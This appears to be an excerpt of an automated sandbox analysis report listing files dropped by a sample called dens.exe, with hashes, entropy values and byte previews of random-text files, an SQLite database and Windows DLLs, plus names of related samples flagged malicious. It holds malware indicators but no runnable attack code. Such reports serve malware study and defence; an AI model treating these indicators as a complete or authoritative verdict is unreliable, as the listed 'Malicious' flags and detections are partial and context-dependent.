                                                                                                                                                                                                                                            Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):114688
                                                                                                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):119192
                                                                                                                                                                                                                                            Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                                            MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                                            SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                                            SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                                            SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: client.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Runtime.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Built.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: windows update.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: w32e.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: 3ORCHAMYoz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: yuki.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: CIEfSpAIUS.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):49528
                                                                                                                                                                                                                                            Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                                            MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                                            SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                                            SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                                            SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):71448
                                                                                                                                                                                                                                            Entropy (8bit):6.280004093581335
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:5VrJQiOU7v3gWTgI9PBgT5NIMOn27SyBxEU:55JQiOU7/g8L9PBSNIMOn2CU
                                                                                                                                                                                                                                            MD5:90A38A8271379A371A2A4C580E9CD97D
